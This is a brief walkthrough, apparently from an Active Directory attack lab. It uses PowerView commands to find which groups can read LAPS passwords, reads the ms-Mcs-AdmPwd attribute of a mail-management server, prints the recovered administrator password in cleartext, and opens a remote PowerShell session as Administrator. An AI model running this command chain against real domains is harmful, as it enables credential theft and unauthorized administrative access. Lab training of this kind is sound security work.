First Let’s Load PowerView

. .\\PowerView.ps1

Now Let’s get the LAPS Permissions

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -Like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -Match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

As Observed the StudentUsers group can read the ms-Mcs-AdmPwd attribute on the MailMgmt Server

Now Let’s read the ms-Mcs-AdmPwd attribute

Get-DomainComputer | Where-Object samaccountname -match mailmgmt | select samaccountname, ms-Mcs-AdmPwd

As We See we got the Password

Username: us-mailmgmt\\Administrator
Password: ikmY,96J-8!XmB

Now let’s PS Remote to the MailMgmt Server

Enter-PSSession -ComputerName us-mailmgmt -Credential (Get-Credential)

And we are Administrator on the MailMgmt Server